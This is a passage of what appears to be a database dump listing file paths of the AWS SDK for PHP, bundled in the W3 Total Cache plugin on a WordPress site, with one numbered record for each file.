on.php'),(5510,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SesV2/SesV2Client.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SesV2/SesV2Client.php'),(5511,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Sfn/Exception/SfnException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Sfn/Exception/SfnException.php'),(5512,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Sfn/SfnClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Sfn/SfnClient.php'),(5513,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Shield/Exception/ShieldException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Shield/Exception/ShieldException.php'),(5514,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Shield/ShieldClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Shield/ShieldClient.php'),(5515,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Signature/AnonymousSignature.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Signature/AnonymousSignature.php'),(5516,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Signature/S3SignatureV4.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Signature/S3SignatureV4.php'),(5517,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Signature/SignatureInterface.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Signature/SignatureInterface.php'),(5518,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Signature/SignatureProvider.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Signature/SignatureProvider.php'),(5519,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Signature/SignatureTrait.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Signature/SignatureTrait.php'),(5520,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Signature/SignatureV4.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Signature/SignatureV4.php'),(5521,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Sms/Exception/SmsException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Sms/Exception/SmsException.php'),(5522,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Sms/SmsClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Sms/SmsClient.php'),(5523,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SnowBall/Exception/SnowBallException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SnowBall/Exception/SnowBallException.php'),(5524,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SnowBall/SnowBallClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SnowBall/SnowBallClient.php'),(5525,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Sns/Exception/SnsException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Sns/Exception/SnsException.php'),(5526,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Sns/SnsClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Sns/SnsClient.php'),(5527,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Sqs/Exception/SqsException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Sqs/Exception/SqsException.php'),(5528,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Sqs/SqsClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Sqs/SqsClient.php'),(5529,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Ssm/Exception/SsmException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Ssm/Exception/SsmException.php'),(5530,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Ssm/SsmClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Ssm/SsmClient.php'),(5531,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/StorageGateway/Exception/StorageGatewayException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/StorageGateway/Exception/StorageGatewayException.php'),(5532,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/StorageGateway/StorageGatewayClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/StorageGateway/StorageGatewayClient.php'),(5533,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/StreamRequestPayloadMiddleware.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/StreamRequestPayloadMiddleware.php'),(5534,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Sts/Exception/StsException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Sts/Exception/StsException.php'),(5535,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Sts/RegionalEndpoints/Configuration.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Sts/RegionalEndpoints/Configuration.php'),(5536,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Sts/RegionalEndpoints/ConfigurationInterface.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Sts/RegionalEndpoints/ConfigurationInterface.php'),(5537,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Sts/RegionalEndpoints/ConfigurationProvider.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Sts/RegionalEndpoints/ConfigurationProvider.php'),(5538,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Sts/RegionalEndpoints/Exception/ConfigurationException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Sts/RegionalEndpoints/Exception/ConfigurationException.php'),(5539,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Sts/StsClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Sts/StsClient.php'),(5540,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Support/Exception/SupportException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Support/Exception/SupportException.php'),(5541,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Support/SupportClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Support/SupportClient.php'),(5542,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Swf/Exception/SwfException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Swf/Exception/SwfException.php'),(5543,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Swf/SwfClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Swf/SwfClient.php'),(5544,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Synthetics/Exception/SyntheticsException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Synthetics/Exception/SyntheticsException.php'),(5545,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Synthetics/SyntheticsClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Synthetics/SyntheticsClient.php'),(5546,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Textract/Exception/TextractException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Textract/Exception/TextractException.php'),(5547,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Textract/TextractClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Textract/TextractClient.php'),(5548,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/TimestreamQuery/Exception/TimestreamQueryException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/TimestreamQuery/Exception/TimestreamQueryException.php'),(5549,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/TimestreamQuery/TimestreamQueryClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/TimestreamQuery/TimestreamQueryClient.php'),(5550,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/TimestreamWrite/Exception/TimestreamWriteException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/TimestreamWrite/Exception/TimestreamWriteException.php'),(5551,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/TimestreamWrite/TimestreamWriteClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/TimestreamWrite/TimestreamWriteClient.php'),(5552,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/TraceMiddleware.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/TraceMiddleware.php'),(5553,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/TranscribeService/Exception/TranscribeServiceException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/TranscribeService/Exception/TranscribeServiceException.php'),(5554,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/TranscribeService/TranscribeServiceClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/TranscribeService/TranscribeServiceClient.php'),(5555,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Transfer/Exception/TransferException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Transfer/Exception/TransferException.php'),(5556,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Transfer/TransferClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Transfer/TransferClient.php'),(5557,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Translate/Exception/TranslateException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Translate/Exception/TranslateException.php'),(5558,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Translate/TranslateClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Translate/TranslateClient.php'),(5559,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WAFV2/Exception/WAFV2Exception.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WAFV2/Exception/WAFV2Exception.php'),(5560,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WAFV2/WAFV2Client.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WAFV2/WAFV2Client.php'),(5561,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Waf/Exception/WafException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Waf/Exception/WafException.php'),(5562,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Waf/WafClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Waf/WafClient.php'),(5563,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WafRegional/Exception/WafRegionalException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WafRegional/Exception/WafRegionalException.php'),(5564,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WafRegional/WafRegionalClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WafRegional/WafRegionalClient.php'),(5565,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Waiter.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Waiter.php'),(5566,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WellArchitected/Exception/WellArchitectedException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WellArchitected/Exception/WellArchitectedException.php'),(5567,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WellArchitected/WellArchitectedClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WellArchitected/WellArchitectedClient.php'),(5568,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WorkDocs/Exception/WorkDocsException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WorkDocs/Exception/WorkDocsException.php'),(5569,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WorkDocs/WorkDocsClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WorkDocs/WorkDocsClient.php'),(5570,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WorkLink/Exception/WorkLinkException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WorkLink/Exception/WorkLinkException.php'),(5571,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WorkLink/WorkLinkClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WorkLink/WorkLinkClient.php'),(5572,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WorkMail/Exception/WorkMailException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WorkMail/Exception/WorkMailException.php'),(5573,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WorkMail/WorkMailClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WorkMail/WorkMailClient.php'),(5574,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WorkMailMessageFlow/Exception/WorkMailMessageFlowException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WorkMailMessageFlow/Exception/WorkMailMessageFlowException.php'),(5575,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WorkMailMessageFlow/WorkMailMessageFlowClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WorkMailMessageFlow/WorkMailMessageFlowClient.php'),(5576,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WorkSpaces/Exception/WorkSpacesException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WorkSpaces/Exception/WorkSpacesException.php'),(5577,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WorkSpaces/WorkSpacesClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WorkSpaces/WorkSpacesClient.php'),(5578,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WrappedHttpHandler.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WrappedHttpHandler.php'),(5579,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/XRay/Exception/XRayException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/XRay/Exception/XRayException.php'),(5580,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/XRay/XRayClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/XRay/XRayClient.php'),(5581,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/accessanalyzer/2019-11-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/accessanalyzer/2019-11-01/api-2.json.php'),(5582,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/accessanalyzer/2019-11-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/accessanalyzer/2019-11-01/paginators-1.json.php'),(5583,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/acm/2015-12-08/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/acm/2015-12-08/api-2.json.php'),(5584,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/acm/2015-12-08/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/acm/2015-12-08/paginators-1.json.php'),(5585,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/acm/2015-12-08/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/acm/2015-12-08/smoke.json.php'),(5586,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/acm/2015-12-08/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/acm/2015-12-08/waiters-2.json.php'),(5587,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/acm-pca/2017-08-22/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/acm-pca/2017-08-22/api-2.json.php'),(5588,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/acm-pca/2017-08-22/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/acm-pca/2017-08-22/paginators-1.json.php'),(5589,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/acm-pca/2017-08-22/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/acm-pca/2017-08-22/waiters-2.json.php'),(5590,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/alexaforbusiness/2017-11-09/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/alexaforbusiness/2017-11-09/api-2.json.php'),(5591,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/alexaforbusiness/2017-11-09/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/alexaforbusiness/2017-11-09/paginators-1.json.php'),(5592,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/aliases.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/aliases.json.php'),(5593,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/amp/2020-08-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/amp/2020-08-01/api-2.json.php'),(5594,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/amp/2020-08-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/amp/2020-08-01/paginators-1.json.php'),(5595,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/amplify/2017-07-25/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/amplify/2017-07-25/api-2.json.php'),(5596,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/amplify/2017-07-25/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/amplify/2017-07-25/paginators-1.json.php'),(5597,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/amplifybackend/2020-08-11/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/amplifybackend/2020-08-11/api-2.json.php'),(5598,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/amplifybackend/2020-08-11/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/amplifybackend/2020-08-11/paginators-1.json.php'),(5599,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/apigateway/2015-07-09/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/apigateway/2015-07-09/api-2.json.php'),(5600,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/apigateway/2015-07-09/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/apigateway/2015-07-09/paginators-1.json.php'),(5601,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/apigateway/2015-07-09/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/apigateway/2015-07-09/smoke.json.php'),(5602,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/apigatewaymanagementapi/2018-11-29/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/apigatewaymanagementapi/2018-11-29/api-2.json.php'),(5603,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/apigatewaymanagementapi/2018-11-29/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/apigatewaymanagementapi/2018-11-29/paginators-1.json.php'),(5604,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/apigatewayv2/2018-11-29/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/apigatewayv2/2018-11-29/api-2.json.php'),(5605,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/apigatewayv2/2018-11-29/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/apigatewayv2/2018-11-29/paginators-1.json.php'),(5606,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appconfig/2019-10-09/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appconfig/2019-10-09/api-2.json.php'),(5607,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appconfig/2019-10-09/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appconfig/2019-10-09/paginators-1.json.php'),(5608,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appflow/2020-08-23/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appflow/2020-08-23/api-2.json.php'),(5609,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appflow/2020-08-23/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appflow/2020-08-23/paginators-1.json.php'),(5610,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appintegrations/2020-07-29/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appintegrations/2020-07-29/api-2.json.php'),(5611,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appintegrations/2020-07-29/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appintegrations/2020-07-29/paginators-1.json.php'),(5612,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/application-autoscaling/2016-02-06/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/application-autoscaling/2016-02-06/api-2.json.php'),(5613,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/application-autoscaling/2016-02-06/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/application-autoscaling/2016-02-06/paginators-1.json.php'),(5614,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/application-autoscaling/2016-02-06/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/application-autoscaling/2016-02-06/smoke.json.php'),(5615,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/application-insights/2018-11-25/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/application-insights/2018-11-25/api-2.json.php'),(5616,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/application-insights/2018-11-25/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/application-insights/2018-11-25/paginators-1.json.php'),(5617,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/applicationcostprofiler/2020-09-10/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/applicationcostprofiler/2020-09-10/api-2.json.php'),(5618,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/applicationcostprofiler/2020-09-10/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/applicationcostprofiler/2020-09-10/paginators-1.json.php'),(5619,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appmesh/2018-10-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appmesh/2018-10-01/api-2.json.php'),(5620,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appmesh/2018-10-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appmesh/2018-10-01/paginators-1.json.php'),(5621,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appmesh/2019-01-25/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appmesh/20